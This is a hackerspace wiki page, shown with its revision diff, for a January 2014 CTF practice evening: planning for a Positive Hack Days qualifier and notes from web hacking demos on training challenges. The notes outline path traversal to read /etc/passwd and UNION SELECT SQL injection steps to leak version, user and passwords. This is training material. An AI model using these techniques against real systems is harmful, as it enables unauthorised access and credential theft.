Difference between revisions of "CTF-practice-evening:2014-01-13"
(9 intermediate revisions by the same user not shown) | |||
Line 20: | Line 20: | ||
** 48 hours: Jan. 25, 2014, 8 a.m. — Jan. 27, 2014, 8 a.m. | ** 48 hours: Jan. 25, 2014, 8 a.m. — Jan. 27, 2014, 8 a.m. | ||
** http://quals.phdays.ru/ | ** http://quals.phdays.ru/ | ||
− | |||
* Let's meet at Tech Inc on Saturday | * Let's meet at Tech Inc on Saturday | ||
** Jan 25 - 10 AM | ** Jan 25 - 10 AM | ||
+ | ** TODO: Add to Tech Inc event list | ||
+ | ** Sunday is the Tech Inc ALV, so things won't be as organised that day.. | ||
* We are now registered for the Positive Hack Days, as team Knuffelhackers | * We are now registered for the Positive Hack Days, as team Knuffelhackers | ||
Line 42: | Line 43: | ||
* Afterwards, Stef did some web hacking demonstrations, using Certified Secure | * Afterwards, Stef did some web hacking demonstrations, using Certified Secure | ||
** Challenge: Herman Vluchtbeveiliging | ** Challenge: Herman Vluchtbeveiliging | ||
− | ** Add a single quote at the end of a URL to see if it breaks | + | *** Add a single quote at the end of a URL to see if it breaks |
− | ** Can we request a specific page? Example: pagina=/etc/passwd | + | *** Can we request a specific page? Example: pagina=/etc/passwd |
− | ** This doesn't work, but we get enough information to be able to see where it's located in the filesystem | + | *** This doesn't work, but we get enough information to be able to see where it's located in the filesystem |
− | ** With some directory traversal, we can dump the password file | + | *** With some directory traversal, we can dump the password file |
+ | ** Challenge: Security Shop | ||
+ | *** We can exploit the Search Product field | ||
+ | *** Once again, we want to cause an error that gets information from the backend.. we can use a single quote again | ||
+ | *** This indeed gives us the SQL query, including part of the database schema | ||
+ | *** You can use UNION to concatenate two adjacent tables | ||
+ | *** We can try using UNION SELECT 1 -- | ||
+ | *** We can see from the error message that the UNION isn't matching up with a table w/ 5 columns | ||
+ | *** We can now try using UNION SELECT 1,2,3,4 -- | ||
+ | *** Another query that works often is VERSION() | ||
+ | *** If we replace 3 with VERSION(), we can now see the Ubuntu version running | ||
+ | *** USER() also leaks information | ||
+ | *** Trial and error works pretty well here… we need to select things from other tables.. we can guess what these tables might be called | ||
+ | *** You can query the password this way | ||
== Informational Links == | == Informational Links == | ||
Line 56: | Line 70: | ||
== Web-Hacking Wargames == | == Web-Hacking Wargames == | ||
− | * https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project - Web hacking stand-alone SW | + | * https://www.certifiedsecure.com - Start with this one! |
− | * http://tostercrums.blogspot.nl/2011/11/running-webgoat-owasp-in-ubuntu-vm.html - Installation advice | + | * OWASP Web Goat (requires setting up a VM) |
− | * http://webappsecmovies.sourceforge.net/webgoat/ - solutions | + | ** https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project - Web hacking stand-alone SW |
+ | ** http://tostercrums.blogspot.nl/2011/11/running-webgoat-owasp-in-ubuntu-vm.html - Installation advice | ||
+ | ** http://webappsecmovies.sourceforge.net/webgoat/ - solutions | ||
* http://www.hackthissite.org | * http://www.hackthissite.org | ||
− |
Latest revision as of 22:35, 13 January 2014
CTF-practice-evening:2014-01-13 | |
---|---|
Date | 2014/01/13 |
Time | |
Location | Tech Inc |
Type | Workshop |
Contact | Melanie |
Contents
Capture The Flag evening - Part 4
- 13 January, 2014 - 8 PM
- Please bring along a laptop with you!!!
General CTF Info
- See the page for the Ctf-evenings
- Link to the Tech Inc Challenge Website Scoreboard
Our 1st CTF
- Positive Hack Days (PhD) qualifier
- 48 hours: Jan. 25, 2014, 8 a.m. — Jan. 27, 2014, 8 a.m.
- http://quals.phdays.ru/
- Let's meet at Tech Inc on Saturday
- Jan 25 - 10 AM
- TODO: Add to Tech Inc event list
- Sunday is the Tech Inc ALV, so things won't be as organised that day..
- We are now registered for the Positive Hack Days, as team Knuffelhackers
- See: http://knuffelhackers.nl
- Stuff to prepare
- Stepping stone box (for storing tools, and allowing lots of people access)
- Edit pad - etherpad or https://quadpad.lqdn.fr
- We will want to archive this afterwards, for write-ups and stuff
- IRC channel - create a password-protected #techinc-ctf channel
- We have a mailing list already - http://technologia-incognita.nl/cgi-bin/mailman/listinfo/ctf
Web hacking!!!!
- Julius is talking about OWASP and Web Hacking this evening
- Topics: brute force, SQL injections, Network eavesdropping, XSS, Session hijacking
- Afterwards, Stef did some web hacking demonstrations, using Certified Secure
- Challenge: Herman Vluchtbeveiliging
- Add a single quote at the end of a URL to see if it breaks
- Can we request a specific page? Example: pagina=/etc/passwd
- This doesn't work, but we get enough information to be able to see where it's located in the filesystem
- With some directory traversal, we can dump the password file
- Challenge: Security Shop
- We can exploit the Search Product field
- Once again, we want to cause an error that gets information from the backend.. we can use a single quote again
- This indeed gives us the SQL query, including part of the database schema
- You can use UNION to concatenate two adjacent tables
- We can try using UNION SELECT 1 --
- We can see from the error message that the UNION isn't matching up with a table w/ 5 columns
- We can now try using UNION SELECT 1,2,3,4 --
- Another query that works often is VERSION()
- If we replace 3 with VERSION(), we can now see the Ubuntu version running
- USER() also leaks information
- Trial and error works pretty well here… we need to select things from other tables.. we can guess what these tables might be called
- You can query the password this way
- Challenge: Herman Vluchtbeveiliging
Informational Links
Web-Hacking Wargames
- https://www.certifiedsecure.com - Start with this one!
- OWASP Web Goat (requires setting up a VM)
- https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project - Web hacking stand-alone SW
- http://tostercrums.blogspot.nl/2011/11/running-webgoat-owasp-in-ubuntu-vm.html - Installation advice
- http://webappsecmovies.sourceforge.net/webgoat/ - solutions
- http://www.hackthissite.org